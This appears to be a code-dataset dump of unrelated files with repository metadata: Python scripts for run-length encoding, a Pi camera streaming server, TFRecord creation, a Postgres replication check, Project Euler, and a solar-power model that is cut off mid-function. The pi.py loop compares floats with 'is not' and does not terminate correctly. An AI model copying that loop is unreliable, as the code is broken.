dcPwrSysRelayStringValue=dcPwrSysRelayStringValue, dcPwrSysCustomIpEntry=dcPwrSysCustomIpEntry, dcPwrSysRectAlrmIndex=dcPwrSysRectAlrmIndex, dcPwrSysCurrAlrmTbl=dcPwrSysCurrAlrmTbl, dcPwrSysMiscAlrmCount=dcPwrSysMiscAlrmCount, dcPwrSysBattAlrmIndex=dcPwrSysBattAlrmIndex, dcPwrSysMinorAlarm=dcPwrSysMinorAlarm, dcPwrSysSoftwareTimestamp=dcPwrSysSoftwareTimestamp, dcPwrSysAdioAlrmTbl=dcPwrSysAdioAlrmTbl, dcPwrSysAdioAlrmIntegerValue=dcPwrSysAdioAlrmIntegerValue, alpha=alpha, dcPwrSysCurrAlrmIntegerValue=dcPwrSysCurrAlrmIntegerValue, dcPwrSysBattAlrmTable=dcPwrSysBattAlrmTable, dcPwrSysAlarmTriggerValue=dcPwrSysAlarmTriggerValue, dcPwrSysCurrAlrmCount=dcPwrSysCurrAlrmCount, dcPwrSysCurrAlrmEntry=dcPwrSysCurrAlrmEntry, dcPwrSysBattAlrmEntry=dcPwrSysBattAlrmEntry, dcPwrSysAdioAlrmStringValue=dcPwrSysAdioAlrmStringValue, dcPwrSysInvAlrmEntry=dcPwrSysInvAlrmEntry, dcPwrSysVoltAlrmSeverity=dcPwrSysVoltAlrmSeverity, dcPwrSysCounterIpName=dcPwrSysCounterIpName, dcPwrSysCurrAlrmSeverity=dcPwrSysCurrAlrmSeverity, dcPwrSysCntrlrIpEntry=dcPwrSysCntrlrIpEntry, dcPwrSysDigAlrmSeverity=dcPwrSysDigAlrmSeverity, dcPwrSysTimeStamp=dcPwrSysTimeStamp, dcPwrSysCustomAlrmTbl=dcPwrSysCustomAlrmTbl, dcPwrSysVoltAlrmTable=dcPwrSysVoltAlrmTable, dcPwrSysConvAlrmEntry=dcPwrSysConvAlrmEntry, dcPwrSysVoltAlrmEntry=dcPwrSysVoltAlrmEntry, dcPwrSysAnalogOpStringValue=dcPwrSysAnalogOpStringValue, dcPwrSysRelayTbl=dcPwrSysRelayTbl, dcPwrSysDischargeVolts=dcPwrSysDischargeVolts, dcPwrSysVoltAlrmName=dcPwrSysVoltAlrmName, dcPwrSysConvIpStringValue=dcPwrSysConvIpStringValue, dcPwrSysCtrlAlrmEntry=dcPwrSysCtrlAlrmEntry, dcPwrSysBattAlrmTbl=dcPwrSysBattAlrmTbl, dcPwrSysInputsTbl=dcPwrSysInputsTbl, dcPwrSysRectAlrmEntry=dcPwrSysRectAlrmEntry, dcPwrSysAgentStartupTrap=dcPwrSysAgentStartupTrap, dcPwrSysMajorAlarmActiveTrap=dcPwrSysMajorAlarmActiveTrap, dcPwrSysBattAlrmCount=dcPwrSysBattAlrmCount, dcPwrVarbindNameReference=dcPwrVarbindNameReference, dcPwrSysCustomAlrmCount=dcPwrSysCustomAlrmCount, dcPwrSysBattAlrmIntegerValue=dcPwrSysBattAlrmIntegerValue, dcPwrSysInvAlrmCount=dcPwrSysInvAlrmCount, dcPwrSysTempAlrmName=dcPwrSysTempAlrmName, dcpower=dcpower, dcPwrSysCustomAlrmSeverity=dcPwrSysCustomAlrmSeverity, dcPwrSysTempAlrmTable=dcPwrSysTempAlrmTable, dcPwrSysRectIpTbl=dcPwrSysRectIpTbl, dcPwrSysMajorAlarm=dcPwrSysMajorAlarm, dcPwrSysCustomAlrmStringValue=dcPwrSysCustomAlrmStringValue, dcPwrSysCurrAlrmIndex=dcPwrSysCurrAlrmIndex, dcPwrSysConvAlrmIntegerValue=dcPwrSysConvAlrmIntegerValue, dcPwrSysInvAlrmSeverity=dcPwrSysInvAlrmSeverity, dcPwrSysTimerIpTbl=dcPwrSysTimerIpTbl, dcPwrSysDigIpIntegerValue=dcPwrSysDigIpIntegerValue, dcPwrSysRelayIntegerValue=dcPwrSysRelayIntegerValue, dcPwrSysAlrmsTbl=dcPwrSysAlrmsTbl, dcPwrSysRelayEntry=dcPwrSysRelayEntry, dcPwrSysCurrAlrmName=dcPwrSysCurrAlrmName, dcPwrSysCtrlAlrmIntegerValue=dcPwrSysCtrlAlrmIntegerValue, dcPwrSysTimerIpTable=dcPwrSysTimerIpTable, dcPwrSysCustomIpStringValue=dcPwrSysCustomIpStringValue, dcPwrSysConvAlrmSeverity=dcPwrSysConvAlrmSeverity, dcPwrSysAdioAlrmTable=dcPwrSysAdioAlrmTable, dcPwrSysDigAlrmTbl=dcPwrSysDigAlrmTbl, dcPwrSysAdioAlrmCount=dcPwrSysAdioAlrmCount, dcPwrSysAnalogOpName=dcPwrSysAnalogOpName, dcPwrSysCustomIpTbl=dcPwrSysCustomIpTbl, dcPwrSysCounterIpStringValue=dcPwrSysCounterIpStringValue, dcPwrSysMiscAlrmIntegerValue=dcPwrSysMiscAlrmIntegerValue, dcPwrSysRelayCount=dcPwrSysRelayCount, dcPwrSysRectIpStringValue=dcPwrSysRectIpStringValue, dcPwrSysDigIpEntry=dcPwrSysDigIpEntry, dcPwrSysAnalogOpEntry=dcPwrSysAnalogOpEntry, dcPwrSysBattAlrmSeverity=dcPwrSysBattAlrmSeverity, dcPwrSysMiscAlrmTable=dcPwrSysMiscAlrmTable, dcPwrSysRelayName=dcPwrSysRelayName, dcPwrSysAnalogOpCount=dcPwrSysAnalogOpCount, dcPwrSysCounterIpIndex=dcPwrSysCounterIpIndex, dcPwrSysInvAlrmName=dcPwrSysInvAlrmName, dcPwrSysConvAlrmCount=dcPwrSysConvAlrmCount, dcPwrSysCurrAlrmTable=dcPwrSysCurrAlrmTable, dcPwrSysVoltAlrmTbl=dcPwrSysVoltAlrmTbl, dcPwrSysAnalogOpTbl=dcPwrSysAnalogOpTbl, dcPwrSysMiscAlrmTbl=dcPwrSysMiscAlrmTbl, dcPwrSysContactName=dcPwrSysContactName, dcPwrSysTempAlrmCount=dcPwrSysTempAlrmCount, dcPwrSysTraps=dcPwrSysTraps, dcPwrSysCounterIpTbl=dcPwrSysCounterIpTbl, dcPwrSysConvAlrmTable=dcPwrSysConvAlrmTable, dcPwrSysCustomIpIndex=dcPwrSysCustomIpIndex, dcPwrSysSiteName=dcPwrSysSiteName, dcPwrSysRelaySeverity=dcPwrSysRelaySeverity, dcPwrSysCtrlAlrmTbl=dcPwrSysCtrlAlrmTbl, dcPwrSysDigIpName=dcPwrSysDigIpName, dcPwrSysCntrlrIpIndex=dcPwrSysCntrlrIpIndex, dcPwrSysDigIpTable=dcPwrSysDigIpTable, dcPwrSysCustomIpName=dcPwrSysCustomIpName, dcPwrSysRectAlrmCount=dcPwrSysRectAlrmCount, dcPwrSysCtrlAlrmName=dcPwrSysCtrlAlrmName, dcPwrSysTempAlrmIndex=dcPwrSysTempAlrmIndex, dcPwrSysMinorAlarmActiveTrap=dcPwrSysMinorAlarmActiveTrap, dcPwrSysCustomAlrmTable=dcPwrSysCustomAlrmTable, dcPwrSysTimerIpCount=dcPwrSysTimerIpCount, dcPwrSysPhoneNumber=dcPwrSysPhoneNumber, dcPwrSysAlarmClearedTrap=dcPwrSysAlarmClearedTrap)
| [
"dcwangmit01@gmail.com"
] | dcwangmit01@gmail.com |
b31321ac3e23c0e48f3a65038b6c320737c09e3f | e62fdc5a601741eb858aed6ffe056e6ac708e081 | /week1/rle.py | 0c6aa7a9b08e5f89d849387dd223edcd1ea89c45 | [] | no_license | MathuraMG/learning-machine | c589556d6400b51557f9f54e6884998b3093d24d | 71bb7d44900af131fa28cd5f051fd98040f325f3 | refs/heads/master | 2020-04-05T22:56:34.485343 | 2017-01-05T15:07:23 | 2017-01-05T15:07:23 | 68,153,926 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,136 | py | from __future__ import print_function
global_output = []
def encode(input):
prev_char = input[0]
curr_char = input[1]
curr_len = 1
output = [[prev_char,curr_len]];
for i in range(1,len(input)):
curr_char = input[i]
if prev_char == curr_char:
output[len(output)-1][1]+=1
else:
output.append([curr_char,1])
prev_char = curr_char
print('The encoded output is - ',end='')
for i in range(len(output)):
print(output[i][1],end='')
print(output[i][0],end='')
print('\n\n********************************************\ndecoding\n\n')
input = ''
for i in range(len(output)):
for j in range(output[i][1]):
input+=(output[i][0])
print('The decoded input is - ',end='')
print(input)
def main():
while True:
print('\n\n********************************************\ntype exit to leave program\n\n')
input_string = raw_input("enter input : ")
if(input_string == 'exit'):
break
print('\n\n')
encode(input_string)
if __name__ == "__main__":
main()
| [
"mmg9291@gmail.com"
] | mmg9291@gmail.com |
96e39bd588f9626dd6b4e0636638a73b71de9323 | 4b4154d96ec6c91ac6c1cd1b87549ab76b8aee90 | /1-design-patterns/behavioral/strategy/strategy_1.py | c4f9eda359393ffbd6f67cfe042f8004567975ad | [] | no_license | ivanhumenyuk/design-paterns | da36c6258c6369064c2a956c4e97115b85e0af56 | c518958cb351d1f4030018a0720205d887d8e74e | refs/heads/master | 2023-02-19T00:31:12.109044 | 2021-01-18T11:18:04 | 2021-01-18T11:18:04 | 322,827,455 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 896 | py | from abc import ABC, abstractmethod
class SalesSystem(ABC):
@abstractmethod
def discount(self, amount: float):
pass
class BaseSalesSystem(SalesSystem):
def discount(self, amount: float):
return amount * 0.92
class GoldSalesSystem(SalesSystem):
def discount(self, amount: float):
return amount * 0.75
class PremiumSalesSystem(SalesSystem):
def discount(self, amount: float):
return amount * 0.8
class NextYearSubscription:
def __init__(self, sale: SalesSystem):
self.price = 0
self.sale = sale
def set_price(self, price):
self.price = price
def calculate_discount(self):
return f'Discount is {self.sale.discount(self.price)}'
if __name__ == '__main__':
base_client = NextYearSubscription(BaseSalesSystem())
base_client.set_price(1000)
print(base_client.calculate_discount())
| [
"vanya19960529@gmail.com"
] | vanya19960529@gmail.com |
c8a7032f68913beb07d201079216842e34ee9eeb | 0abbaa3db2361d8dde8d701c9e6f67533aad287a | /Garbage/pi.py | 0ebb6aa5d1fb500e3dbacda6a21f85ae6a90b79f | [] | no_license | ducochapelle/CodeJam | bff72d6952e92453922b7f79970cfb89eb80b29c | fee3c643c87ea410b0b9bf6e81da2265b290efd8 | refs/heads/master | 2021-01-10T12:21:00.398240 | 2015-12-09T19:36:42 | 2015-12-09T19:36:42 | 47,709,383 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 290 | py | # print pi to the 5th decimal
# given pi = 4(1/1-1/3+1/5-1/7...)
pseudo_pi = 1
sum_fract = 0
bottom = 1.0
sign = 1
while round(pseudo_pi,5) is not 3.14159:
sum_fract += sign / bottom
bottom += 2
sign *= -1
pseudo_pi = 4 * sum_fract
print pseudo_pi, bottom
| [
"duco.chapelle@gmail.com"
] | duco.chapelle@gmail.com |
373f495680899101324afcd14270ec1573dec5d3 | 35e28f5c6d3df8c3478f883795a3643881ad71ba | /USG/items.py | dd5ff1735fa2fe2fb05edde1e4eb092069c1b05a | [] | no_license | ajayvjn/USG-WebScrapper | 628cc30e8b6dbac33b9ab36228c1bd72629e98e0 | 093b3e4a1ca8f04f4ce0ca5f574e1275fe2d8a05 | refs/heads/master | 2020-05-20T12:26:08.521352 | 2017-01-30T21:09:25 | 2017-01-30T21:09:25 | 80,463,386 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 307 | py | # -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class UsgItem(scrapy.Item):
# define the fields for your item here like:
# name = scrapy.Field()
url = scrapy.Field()
pass
| [
"ajay.vjn17@gmail.com"
] | ajay.vjn17@gmail.com |
613351e89d22dfa1cec4cfad9beb9fa751759990 | b1b685a1dc5245845b8f419023241c22ca4bf749 | /wikidocs/28-class.py | 4c6003c76d19e09df17fc35bcdfad0aa33db8f96 | [] | no_license | gimslab/python-exam | 040e7202d255e64167c0e0352893707d2d281a2b | 0144073690cd938324b88cf9b46054f5ce69840c | refs/heads/master | 2016-09-06T07:54:00.411019 | 2015-10-11T08:27:07 | 2015-10-11T08:27:07 | 42,339,577 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 290 | py | class Calculator:
def __init__(self):
self.result = 0
def adder(self, num):
self.result += num
return self.result
cal1 = Calculator()
cal2 = Calculator()
print(cal1.adder(3))
print(cal1.adder(2))
print(cal2.adder(4))
print(cal2.adder(3))
print(cal1.result);
print(cal2.result);
| [
"gimslab.com@gmail.com"
] | gimslab.com@gmail.com |
f51f822cd04bc5b1f4cd7cd1c075196b0aaec60a | 4b848709353abd6c628c84f6da084adff133a5c6 | /Server Files/subprocesses/streaming.py | 73bab1d2c12917293abe5361ec53c45b499145db | [] | no_license | DasSpecMaker/Doorbell | b03d72e50dd483291a82408818355827c5f5bf50 | 08227dcc80c4fa61023bea45fdbc13a8bf7410fa | refs/heads/master | 2021-01-06T03:28:50.241654 | 2020-03-31T01:10:55 | 2020-03-31T01:10:55 | 241,210,991 | 0 | 0 | null | 2020-02-17T21:24:20 | 2020-02-17T21:24:19 | null | UTF-8 | Python | false | false | 1,895 | py | import socket
import time
import picamera
import struct
from PIL import Image
import io
import datetime
import sys
import signal
#from subprocess import STDOUT, PIPE
# Start a socket listening for connections on 0.0.0.0:8000 (0.0.0.0 means)
server_socket = socket.socket()
#port = sys.argv[1]
#print(port)
server_socket.bind(('0.0.0.0', 8000))
server_socket.listen(2)
cont = True
pic = False
def handleSnapshotSignal(signalNumber,frame):
print('received user defined signal')
global pic
pic = True;
#changePic()
return
def handleExit(signalNumber,frame):
print('received exit')
connection.close()
server_socket.close();
sys.exit();
return
class StreamingOutput(object):
def __init__(self,sockmakefile):
self.makefile = sockmakefile
def write(self, buf):
#print(buf);
self.makefile.write(buf);
if __name__ == '__main__':
signal.signal(signal.SIGUSR1,handleSnapshotSignal)
signal.signal(signal.SIGTERM,handleExit)
# Accept a single connection and make a file-like object out of it
connection,addr = server_socket.accept();
makefile = connection.makefile('wb');
str1 = ""
try:
camera = picamera.PiCamera()
camera.resolution = (240, 180)
camera.framerate = 24
output = StreamingOutput(makefile)
camera.start_recording(output,format='h264')
while True:
print('While loop')
camera.wait_recording(1)
print(pic)
if pic == True:
print('capture picture statement')
camera.capture('foo.jpg',use_video_port=True)
#camera.capture('foo.data','yuv')
print('exiting picture statement')
pic = False
camera.stop_recording();
except:
print("ERROR: Closing server")
connection.close()
server_socket.close()
finally:
print("closing server")
connection.close()
server_socket.close()
| [
"ngo.victor20@gmail.com"
] | ngo.victor20@gmail.com |
265d01952ab7506e909f20767daaeac5d52864e4 | 4ce2cff60ddbb9a3b6fc2850187c86f866091b13 | /tfrecords/src/wai/tfrecords/object_detection/dataset_tools/create_oid_tf_record.py | 271fd0aac175d399dda9b528a9a311145f48cfc1 | [
"MIT",
"Apache-2.0"
] | permissive | 8176135/tensorflow | 18cb8a0432ab2a0ea5bacd03309e647f39cb9dd0 | 2c3b4b1d66a80537f3e277d75ec1d4b43e894bf1 | refs/heads/master | 2020-11-26T05:00:56.213093 | 2019-12-19T08:13:44 | 2019-12-19T08:13:44 | 228,970,478 | 0 | 0 | null | 2019-12-19T03:51:38 | 2019-12-19T03:51:37 | null | UTF-8 | Python | false | false | 5,240 | py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
r"""Creates TFRecords of Open Images dataset for object detection.
Example usage:
python object_detection/dataset_tools/create_oid_tf_record.py \
--input_box_annotations_csv=/path/to/input/annotations-human-bbox.csv \
--input_image_label_annotations_csv=/path/to/input/annotations-label.csv \
--input_images_directory=/path/to/input/image_pixels_directory \
--input_label_map=/path/to/input/labels_bbox_545.labelmap \
--output_tf_record_path_prefix=/path/to/output/prefix.tfrecord
CSVs with bounding box annotations and image metadata (including the image URLs)
can be downloaded from the Open Images GitHub repository:
https://github.com/openimages/dataset
This script will include every image found in the input_images_directory in the
output TFRecord, even if the image has no corresponding bounding box annotations
in the input_annotations_csv. If input_image_label_annotations_csv is specified,
it will add image-level labels as well. Note that the information of whether a
label is positivelly or negativelly verified is NOT added to tfrecord.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import contextlib2
import pandas as pd
import tensorflow as tf
from wai.tfrecords.object_detection.dataset_tools import oid_tfrecord_creation
from wai.tfrecords.object_detection.dataset_tools import tf_record_creation_util
from wai.tfrecords.object_detection.utils import label_map_util
tf.flags.DEFINE_string('input_box_annotations_csv', None,
'Path to CSV containing image bounding box annotations')
tf.flags.DEFINE_string('input_images_directory', None,
'Directory containing the image pixels '
'downloaded from the OpenImages GitHub repository.')
tf.flags.DEFINE_string('input_image_label_annotations_csv', None,
'Path to CSV containing image-level labels annotations')
tf.flags.DEFINE_string('input_label_map', None, 'Path to the label map proto')
tf.flags.DEFINE_string(
'output_tf_record_path_prefix', None,
'Path to the output TFRecord. The shard index and the number of shards '
'will be appended for each output shard.')
tf.flags.DEFINE_integer('num_shards', 100, 'Number of TFRecord shards')
FLAGS = tf.flags.FLAGS
def main(_):
tf.logging.set_verbosity(tf.logging.INFO)
required_flags = [
'input_box_annotations_csv', 'input_images_directory', 'input_label_map',
'output_tf_record_path_prefix'
]
for flag_name in required_flags:
if not getattr(FLAGS, flag_name):
raise ValueError('Flag --{} is required'.format(flag_name))
label_map = label_map_util.get_label_map_dict(FLAGS.input_label_map)
all_box_annotations = pd.read_csv(FLAGS.input_box_annotations_csv)
if FLAGS.input_image_label_annotations_csv:
all_label_annotations = pd.read_csv(FLAGS.input_image_label_annotations_csv)
all_label_annotations.rename(
columns={'Confidence': 'ConfidenceImageLabel'}, inplace=True)
else:
all_label_annotations = None
all_images = tf.gfile.Glob(
os.path.join(FLAGS.input_images_directory, '*.jpg'))
all_image_ids = [os.path.splitext(os.path.basename(v))[0] for v in all_images]
all_image_ids = pd.DataFrame({'ImageID': all_image_ids})
all_annotations = pd.concat(
[all_box_annotations, all_image_ids, all_label_annotations])
tf.logging.log(tf.logging.INFO, 'Found %d images...', len(all_image_ids))
with contextlib2.ExitStack() as tf_record_close_stack:
output_tfrecords = tf_record_creation_util.open_sharded_output_tfrecords(
tf_record_close_stack, FLAGS.output_tf_record_path_prefix,
FLAGS.num_shards)
for counter, image_data in enumerate(all_annotations.groupby('ImageID')):
tf.logging.log_every_n(tf.logging.INFO, 'Processed %d images...', 1000,
counter)
image_id, image_annotations = image_data
# In OID image file names are formed by appending ".jpg" to the image ID.
image_path = os.path.join(FLAGS.input_images_directory, image_id + '.jpg')
with tf.gfile.Open(image_path) as image_file:
encoded_image = image_file.read()
tf_example = oid_tfrecord_creation.tf_example_from_annotations_data_frame(
image_annotations, label_map, encoded_image)
if tf_example:
shard_idx = int(image_id, 16) % FLAGS.num_shards
output_tfrecords[shard_idx].write(tf_example.SerializeToString())
if __name__ == '__main__':
tf.app.run()
| [
"coreytsterling@gmail.com"
] | coreytsterling@gmail.com |
5d0a2f7e05ee7c3731f9b7550e0d5d9f8625cb88 | 78c08cd3ef66836b44373280a333c040ccb99605 | /ostap/fitting/tests/test_fitting_convolution.py | 3f980fbf093211f18849b15254d2f25697d8e7a7 | [
"BSD-3-Clause"
] | permissive | Pro100Tema/ostap | 11ccbc546068e65aacac5ddd646c7550086140a7 | 1765304fce43714e1f51dfe03be0daa5aa5d490f | refs/heads/master | 2023-02-24T08:46:07.532663 | 2020-01-27T13:46:30 | 2020-01-27T13:46:30 | 200,378,716 | 0 | 0 | BSD-3-Clause | 2019-08-03T13:28:08 | 2019-08-03T13:28:07 | null | UTF-8 | Python | false | false | 3,426 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# =============================================================================
# Copyright (c) Ostap developers.
# =============================================================================
# @file test_fitting_convolution.py
# Test module for ostap/fitting/convolution.py
# =============================================================================
""" Test module for ostap/fitting/convolution.py
"""
# =============================================================================
__author__ = "Ostap developers"
__all__ = () ## nothing to import
# =============================================================================
import ROOT, random
import ostap.fitting.roofit
import ostap.fitting.models as Models
from ostap.core.core import cpp, VE, dsID
from ostap.logger.utils import rooSilent
# =============================================================================
# logging
# =============================================================================
from ostap.logger.logger import getLogger
if '__main__' == __name__ or '__builtin__' == __name__ :
logger = getLogger ( 'test_fitting_convolution' )
else :
logger = getLogger ( __name__ )
# =============================================================================
## make
x = ROOT.RooRealVar ( 'x', 'test' , 1 , 10 )
models = set()
# =============================================================================
## Asymmetric Laplace
# =============================================================================
def test_laplace():
logger.info ('Test Asymmetric Laplace shape' )
laplace = Models.AsymmetricLaplace_pdf ( name = 'AL',
xvar = x ,
mean = 5 ,
slope = 1 )
from ostap.fitting.convolution import Convolution_pdf
## constant resolution
laplace_1 = Convolution_pdf ( name = 'L1' , pdf = laplace, resolution = 0.75 )
## resolution PDF
from ostap.fitting.resolution import ResoApo2
rAp = ResoApo2 ( 'A' , x , 0.75 )
## resolution as PDF
laplace_2 = Convolution_pdf ( name = 'L2' , pdf = laplace, resolution = rAp )
laplace.draw( silent = True )
laplace_1.draw( silent = True )
laplace_2.draw()
models.add ( laplace )
models.add ( laplace_1 )
models.add ( laplace_2 )
# =============================================================================
## check that everything is serializable
# =============================================================================
def test_db() :
logger.info('Saving all objects into DBASE')
import ostap.io.zipshelve as DBASE
from ostap.utils.timing import timing
with timing( name = 'Save everything to DBASE'), DBASE.tmpdb() as db :
db['models' ] = models
db.ls()
# =============================================================================
if '__main__' == __name__ :
test_laplace () ## Laplace-function + background
## check finally that everything is serializeable:
test_db ()
# =============================================================================
# The END
# =============================================================================
| [
"Ivan.Belyaev@cern.ch"
] | Ivan.Belyaev@cern.ch |
1c756ee1722315d82f7d75aa98100a4ec775b5fa | e66ef5811180b0692cedb171a97991bb046bde33 | /templates/postgresql.py.j2 | 0a52fe8514d8c592c4c341847f08a0c7c96fd397 | [
"MIT"
] | permissive | MartinHell/ansible-dgc-common | 3b8b8f6dfd25966fab797f806c4c71487e52d3eb | 67fec6d456f688f91d27c0fb6c00f7faccd53af5 | refs/heads/master | 2022-02-24T05:24:56.006179 | 2019-09-20T08:37:19 | 2019-09-20T08:37:19 | 114,650,449 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 718 | j2 | #!/usr/bin/env python
import psycopg2
import sys
try:
conn = psycopg2.connect("dbname='{{ repmgr_db_name }}' user='{{ repmgr_db_user }}' host='localhost' password='{{ repmgr_db_password }}' connect_timeout=1")
except:
sys.stdout.write("Unable to connect to the database\n")
sys.exit(2)
cur = conn.cursor()
cur.execute("""SELECT pg_is_in_recovery()""")
rows = cur.fetchall()
if "False" in repr(rows[0]):
if sys.argv[1] == 'master':
sys.stdout.write("Active\n")
sys.exit(0)
sys.stdout.write("Active\n")
sys.exit(2)
if len(rows) > 0:
if sys.argv[1] == 'slave':
sys.stdout.write("Standby\n")
sys.exit(0)
sys.stdout.write("Standby\n")
sys.exit(2)
| [
"martin.hellstrom@dgc.se"
] | martin.hellstrom@dgc.se |
ddc044cb1da3ccffcbc308251dd875a60f2600f4 | 54083370977a61521548f8b7b914ee15cc8c0330 | /training_data_gen/resize.py | de1f2df08810024b5ede522599b11d0331fc74c4 | [] | no_license | ravindranyk/captcha_cracker | 814e8813f2139d98c725da6b9691e0f612ce3fcf | 66eff7738ea1f5dbd36052a16cd2b932f1bb8bbf | refs/heads/master | 2021-01-23T07:50:28.080650 | 2017-04-02T10:33:12 | 2017-04-02T10:33:12 | 86,423,385 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 391 | py | from PIL import Image
from resizeimage import resizeimage
import glob
def resize_file(in_file, out_file, size):
with Image.open(in_file) as fd:
new_width, new_height = size
fd = fd.resize((new_width, new_height), Image.ANTIALIAS)
fd.save(out_file)
fd.close()
for filename in glob.glob('dataset_1l_java/*.jpg'):
resize_file(filename, filename, (200, 50))
| [
"ravindranyk707@gmail.com"
] | ravindranyk707@gmail.com |
db5c3f8c6618635864e14b710fcc54c82f8e4fd1 | 4697065fedc3df947b50e443d477ea492d32c379 | /Text_Analyzer_SoloLearn/Example_solo.py | bb21b568c51b70abe42736b89f373337f409382a | [] | no_license | Maryam-ask/Python_Tutorial | 3db7fdb2020c1b476d501ccb2e34e1ac3f3b80ae | dc589ee4c0faf1fb384659498b69ac1c9dbb8de4 | refs/heads/master | 2023-06-22T17:09:50.432282 | 2021-07-19T10:51:19 | 2021-07-19T10:51:19 | 387,431,009 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 510 | py | """
Longest Word:
Given a text as input, find and output the longest word.
Sample Input
this is an awesome text
Sample Output
awesome
"""
def count_char(txt):
counter = 0
i = 0
while (i < len(txt)):
counter +=1
i += 1
return counter
text = input("Enter your text: ")
txt_list = text.split(" ")
bigger_word = txt_list[0]
for i in range(1, len(txt_list)):
if count_char(bigger_word) < count_char(txt_list[i]):
bigger_word = txt_list[i]
print(bigger_word)
| [
"maryamaskari19@gmail.com"
] | maryamaskari19@gmail.com |
3a8fe495d062bc57cac1944bc5cfc45f1bf25ac7 | 571b57a3f059a2d9ea78f47aa695c8f3327746f5 | /08.py | 5a1cd895822275733ede409e3fac3cb23f1338df | [] | no_license | pixma500/hello-world | 0bb09c432693ad5f294ef4326dd18d89b90e1201 | ab9cf7813d085624f26bb572d1c9dabfb98441f2 | refs/heads/master | 2022-12-07T04:55:26.483765 | 2020-08-21T04:48:44 | 2020-08-21T04:48:44 | 263,539,911 | 0 | 0 | null | 2020-05-13T06:21:52 | 2020-05-13T06:04:25 | null | UTF-8 | Python | false | false | 1,193 | py | import time
d='7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450'
f=list(str(d))
print(f)
r=len(f)
s=1
w=0
for i in range(0,r-13):
for j in range(0,13):
s*=int(f[i+j])
if s>w:
w=s
s=1
print(w)
print(time.clock())
| [
"svidinoff@mail.ru"
] | svidinoff@mail.ru |
f66e5ca5bccba463ba1c7ea0e178e85c4982a93f | 3e5ecad4d2f681f2f4f749109cc99deea1209ea4 | /Dacon/solar1/test04_solar9.py | 0f9e499e4f86263fff68de5a667aeda9b729cb92 | [] | no_license | SunghoonSeok/Study | f41ede390079037b2090e6df20e5fb38f2e59b8f | 50f02b9c9bac904cd4f6923b41efabe524ff3d8a | refs/heads/master | 2023-06-18T06:47:55.545323 | 2021-07-05T00:47:55 | 2021-07-05T00:47:55 | 324,866,762 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,798 | py | # 7일의 데이터로 2일의 target값 구하기
# 시간별로 데이터를 나눠서 훈련
import numpy as np
import pandas as pd
import tensorflow.keras.backend as K
from tensorflow.keras.models import Model, Sequential
from tensorflow.keras.layers import Dense, Input, LSTM, Dropout, Conv1D, Flatten, MaxPooling1D, GRU, SimpleRNN
from tensorflow.keras.backend import mean, maximum
# 필요 함수 정의
# GHI추가
def Add_features(data):
data['cos'] = np.cos(np.pi/2 - np.abs(data['Hour']%12 - 6)/6*np.pi/2)
data.insert(1,'GHI',data['DNI']*data['cos']+data['DHI'])
data.drop(['cos'], axis= 1, inplace = True)
return data
# 데이터 몇일씩 자르는 함수
def split_x(data, size):
x = []
for i in range(len(data)-size+1):
subset = data[i : (i+size)]
x.append([item for item in subset])
print(type(x))
return np.array(x)
# quantile loss 관련 함수
def quantile_loss(q, y_true, y_pred):
err = (y_true - y_pred)
return K.mean(K.maximum(q*err, (q-1)*err), axis=-1)
quantiles = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]
# 데이터 컬럼을 7개만 쓰겠다
def preprocess_data(data):
data = Add_features(data)
temp = data.copy()
temp = temp[['GHI', 'DHI', 'DNI', 'WS', 'RH', 'T','TARGET']]
return temp.iloc[:, :]
# 모델, Conv1D사용
def DaconModel():
model = Sequential()
model.add(Conv1D(256,2, padding='same', input_shape=(7, 7),activation='relu'))
model.add(Conv1D(128,2, padding='same',activation='relu'))
model.add(Conv1D(64,2, padding='same',activation='relu'))
model.add(Conv1D(32,2, padding='same',activation='relu'))
model.add(Flatten())
model.add(Dense(64,activation='relu'))
model.add(Dense(32,activation='relu'))
model.add(Dense(16,activation='relu'))
model.add(Dense(8,activation='relu'))
model.add(Dense(1))
return model
# optimizer 불러오기
from tensorflow.keras.optimizers import Adam, Adadelta, Adamax, Adagrad
from tensorflow.keras.optimizers import RMSprop, SGD, Nadam
# 컴파일 훈련 함수, optimizer 변수처리하여 lr=0.002부터 줄여나가도록 한다
# lr을 for문 밖에 두면 초기화가 되지 않으니 명심할것
# 총 48(시간수)*9(quantile)*2(Day7,8)개의 체크포인트모델이 생성됨
def only_compile(a, x_train, y_train, x_val, y_val):
for q in quantiles:
print('Day'+str(i)+' ' +str(q)+'실행중입니다.')
model = DaconModel()
optimizer = Adam(lr=0.002)
model.compile(loss = lambda y_true,y_pred: quantile_loss(q,y_true,y_pred), optimizer = optimizer, metrics = [lambda y,y_pred: quantile_loss(q,y,y_pred)])
